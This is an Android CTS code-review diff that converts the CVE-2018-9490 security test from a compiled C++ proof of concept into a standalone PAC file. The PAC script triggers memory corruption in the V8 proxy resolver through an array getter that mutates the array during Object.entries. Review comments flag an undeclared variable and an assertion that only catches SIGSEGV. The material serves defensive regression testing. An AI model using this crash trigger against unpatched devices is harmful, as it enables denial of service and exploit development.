Update and fix test for Android Security CVE-2018-9490
Test: cts-tradefed run cts -m CtsSecurityBulletinHostTestCases -t android.security.cts.Poc18_10#testPocCVE_2018_9490
Bug: 111274046
Change-Id: Id5ee2aaa142d87b452a84d45f43a640f8e44aa4e
Merged-In: Id5ee2aaa142d87b452a84d45f43a640f8e44aa4e
diff --git a/hostsidetests/securitybulletin/AndroidTest.xml b/hostsidetests/securitybulletin/AndroidTest.xml
index 5fbfbd5..d1551d0 100644
--- a/hostsidetests/securitybulletin/AndroidTest.xml
+++ b/hostsidetests/securitybulletin/AndroidTest.xml
@@ -181,7 +181,6 @@
<!--__________________-->
<!-- Bulletin 2018-10 -->
<!-- Please add tests solely from this bulletin below to avoid merge conflict -->
- <option name="push" value="CVE-2018-9490->/data/local/tmp/CVE-2018-9490" />
<option name="push" value="CVE-2018-9515->/data/local/tmp/CVE-2018-9515" />
<!--__________________-->
diff --git a/hostsidetests/securitybulletin/res/CVE-2018-9490.pac b/hostsidetests/securitybulletin/res/CVE-2018-9490.pac
new file mode 100644
index 0000000..9fb7ba8
--- /dev/null
+++ b/hostsidetests/securitybulletin/res/CVE-2018-9490.pac
@@ -0,0 +1,15 @@
+function FindProxyForURL(url, host){
+ alert("enter");
+ let arr = [];
+ arr[1000] = 0x1234;
+
+ arr.__defineGetter__(256, function () {
+ delete arr[256];
+ arr.unshift(1.1);
+ arr.length = 0;
+ });
+
+ Object.entries(arr).toString();
+ alert(JSON.stringify(entries));
+ return 0;
+}
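Review bot: `alert(JSON.stringify(entries));` reads `entries`, which is never declared anywhere in the script, so evaluation throws a ReferenceError at that line and `return 0;` is never reached. The line is carried over unchanged from the SCRIPT macro in the deleted poc.cpp. Because the array operations under test have already run by then, the error makes a non-crashing result ambiguous: a patched device that evaluates the script and one that merely aborts on the script error look the same. Either drop that line or declare the value first, and add a header comment such as `// Regression input for CVE-2018-9490: a patched PAC resolver must evaluate this without crashing.` so the file's purpose and expected outcome are recorded next to the script.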
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2018-9490/Android.mk b/hostsidetests/securitybulletin/securityPatch/CVE-2018-9490/Android.mk
deleted file mode 100644
index a6a520f..0000000
--- a/hostsidetests/securitybulletin/securityPatch/CVE-2018-9490/Android.mk
+++ /dev/null
@@ -1,34 +0,0 @@
-# Copyright (C) 2018 The Android Open Source Project
-#
-# Licensed under the Apache License, Version 2.0 (the "License");
-# you may not use this file except in compliance with the License.
-# You may obtain a copy of the License at
-#
-# http://www.apache.org/licenses/LICENSE-2.0
-#
-# Unless required by applicable law or agreed to in writing, software
-# distributed under the License is distributed on an "AS IS" BASIS,
-# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-# See the License for the specific language governing permissions and
-# limitations under the License.
-
-LOCAL_PATH := $(call my-dir)
-
-include $(CLEAR_VARS)
-LOCAL_MODULE := CVE-2018-9490
-LOCAL_SRC_FILES := poc.cpp
-LOCAL_MULTILIB := both
-LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
-LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
-
-LOCAL_SHARED_LIBRARIES := \
- libpac \
-
-# Tag this module as a cts test artifact
-LOCAL_COMPATIBILITY_SUITE := cts sts vts
-LOCAL_CTS_TEST_PACKAGE := android.security.cts
-
-LOCAL_ARM_MODE := arm
-LOCAL_CPPFLAGS = -Wall -Werror
-
-include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2018-9490/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2018-9490/poc.cpp
deleted file mode 100644
index c6d332a..0000000
--- a/hostsidetests/securitybulletin/securityPatch/CVE-2018-9490/poc.cpp
+++ /dev/null
@@ -1,52 +0,0 @@
-/*
- * Copyright (C) 2018 The Android Open Source Project
- *
- * Licensed under the Apache License, Version 2.0 (the "License");
- * you may not use this file except in compliance with the License.
- * You may obtain a copy of the License at
- *
- * http://www.apache.org/licenses/LICENSE-2.0
- *
- * Unless required by applicable law or agreed to in writing, software
- * distributed under the License is distributed on an "AS IS" BASIS,
- * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
- * See the License for the specific language governing permissions and
- * limitations under the License.
- */
-
-#ifndef _GNU_SOURCE
-#define _GNU_SOURCE
-#endif
-#include <sys/types.h>
-#include <sys/wait.h>
-#include <memory>
-#include <proxy_resolver_v8_wrapper.h>
-
-#define URL u""
-#define HOST u""
-#define SCRIPT \
- u"function FindProxyForURL(url, host){\n" \
- " alert(\"enter\");\n" \
- " let arr = [];\n" \
- " arr[1000] = 0x1234;\n" \
- "\n" \
- " arr.__defineGetter__(256, function () {\n" \
- " delete arr[256];\n" \
- " arr.unshift(1.1);\n" \
- " arr.length = 0;\n" \
- " });\n" \
- "\n" \
- " Object.entries(arr).toString();\n" \
- " alert(JSON.stringify(entries));\n" \
- "\n" \
- " return 0;\n" \
- "}\n"
-
-int main(void) {
- auto resolver = std::unique_ptr<ProxyResolverV8Handle, void(*)(ProxyResolverV8Handle*)>(
- ProxyResolverV8Handle_new(), ProxyResolverV8Handle_delete);
- ProxyResolverV8Handle_SetPacScript(resolver.get(), SCRIPT);
- auto results = std::unique_ptr<char16_t, decltype(&free)>(ProxyResolverV8Handle_GetProxyForURL(
- resolver.get(), URL, HOST), &free);
- return 0;
-}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/Poc18_10.java b/hostsidetests/securitybulletin/src/android/security/cts/Poc18_10.java
index 0423b37..dfc3de0 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/Poc18_10.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/Poc18_10.java
@@ -42,7 +42,7 @@
*/
@SecurityTest
public void testPocCVE_2018_9490() throws Exception {
- int code = AdbUtils.runPocGetExitStatus("/data/local/tmp/CVE-2018-9490", getDevice(), 60);
+ int code = AdbUtils.runProxyAutoConfig("CVE-2018-9490", getDevice());
assertTrue(code != 139); // 128 + signal 11
}
}
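Review bot: `assertTrue(code != 139)` passes for every outcome other than SIGSEGV. A run in which the PAC file was never delivered or evaluated, or in which the resolver died from a different signal, is therefore reported as a pass. The previous call carried an explicit 60-second timeout, while `runProxyAutoConfig("CVE-2018-9490", getDevice())` shows none at this call site. Its return contract is not visible in this hunk, so confirm what it yields on setup failure or a hang. At minimum give the assertion a message, `assertTrue("PAC evaluation crashed with SIGSEGV (exit 139)", code != 139);`, and consider failing the test when the helper reports that the script did not run. The enclosing class begins outside the hunk.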